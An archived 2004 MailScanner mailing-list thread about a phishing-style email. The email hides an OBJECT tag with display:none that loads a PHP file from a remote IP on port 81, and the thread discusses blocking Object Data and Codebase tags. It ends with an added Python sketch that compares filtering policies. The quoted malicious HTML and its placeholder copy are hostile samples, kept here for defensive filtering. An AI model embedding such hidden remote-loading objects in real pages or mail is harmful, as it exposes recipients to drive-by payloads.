Dangerous html tag?

Julian Field mailscanner at ecs.soton.ac.uk
Thu Mar 18 11:38:48 GMT 2004


I now block all Object Data tags as well as Object Codebase.
Whether I want to block all Object tags is up for discussion.
Your thoughts please?

At 08:43 18/03/2004, you wrote:
>I have this in MailScanner.conf:
>
>Allow Object Codebase Tags = no
>Convert Dangerous HTML To Text = yes
>
>Should this have killed that tag, if so it didn't!
>
>Maybe it's a good idea to block every tag with:
>OBJECT STYLE="display:none" DATA="
>it will not show anything anyway therefore can only be malicious?
>
>
>On Thu, 18 Mar 2004, Michele Neylon :: Blacknight Solutions wrote:
>
> > You could block the OBJECT tag
> >
> > Mr. Michele Neylon
> > Blacknight Internet Solutions Ltd
> > http://www.blacknightsolutions.ie/
> > http://www.search.ie/
> > Tel. + 353 (0)59 9137101
> > Lowest price domains in Ireland
> >
> > > -----Original Message-----
> > > From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
> > > Behalf Of Remco Barendse
> > > Sent: 18 March 2004 08:04
> > > To: MAILSCANNER at JISCMAIL.AC.UK
> > > Subject: [MAILSCANNER] Dangerous html tag?
> > >
> > >
> > > Hi!
> > >
> > > I just received a message that contained ActiveX controls, nothing would
> > > show up in Outlook.
> > >
> > > I opened the mail and tried to look inside, this is the contents: (I would
> > > *NOT* try the url below on any windows/X browser)
> > >
> > > <html><body>
> > > <font  face="System">
> > > <OBJECT STYLE="display:none" DATA="http://68.6.144.228:81/185869.php">
> > > </OBJECT></body></html>
> > >
> > > I tried opening the .php file to see what it is (although I have a pretty
> > > good guess) but it failed because my firewall blocked port 81.
> > >
> > > Can we ban/kill/modify any such tags or will this ruin every e-mail with
> > > some pictures in it?
> > >
> > > Thanks!
> > > Remco
> > >
> >
> >
> > --
> > Email scanned by Blacknight for viruses and dangerous content.
> > Visit http://www.blacknight.ie for more information
> >

--
Julian Field
www.MailScanner.info
MailScanner thanks transtec Computers for their support

PGP footprint: EE81 D763 3DB0 0BFD E1DC 7222 11F6 5947 1415 B654
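
Added example, not part of the original post and not MailScanner's own code: a Python sketch comparing the blocking policies discussed in this thread (Object Codebase only, Codebase plus Data, hidden Data objects only, every Object tag) against a message shaped like the one quoted above. The policy names and the sample message are assumptions; the sample uses a documentation placeholder host rather than the address from the post.

```python
from html.parser import HTMLParser

# Constructed sample modelled on the quoted message (placeholder host).
SAMPLE = ('<html><body><font face="System">'
          '<OBJECT STYLE="display:none" DATA="http://192.0.2.1:81/x.php">'
          '</OBJECT></body></html>')


class ObjectTagFinder(HTMLParser):
    """Collect the attributes of every <object> start tag."""

    def __init__(self):
        super().__init__()
        self.objects = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so OBJECT/DATA
        # written in upper case are matched as well.
        if tag == "object":
            self.objects.append({k: (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True if the inline style hides the element with display:none."""
    style = attrs.get("style", "").lower().replace(" ", "")
    return "display:none" in style


def verdict(html, policy):
    """Return True if the message would be treated as dangerous.

    policy names are hypothetical labels, not MailScanner options:
      "codebase"      - only <object codebase=...>
      "codebase+data" - also <object data=...>
      "hidden-data"   - only <object data=...> styled display:none
      "all"           - any <object> tag at all
    """
    finder = ObjectTagFinder()
    finder.feed(html)
    finder.close()
    for a in finder.objects:
        if policy == "all":
            return True
        if policy in ("codebase", "codebase+data") and "codebase" in a:
            return True
        if policy == "codebase+data" and "data" in a:
            return True
        if policy == "hidden-data" and "data" in a and is_hidden(a):
            return True
    return False
```

The hidden-data check only sees an inline STYLE attribute; an object hidden through a stylesheet rule or zero width and height would pass it, which is one argument for the broader Data or all-Object policies.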


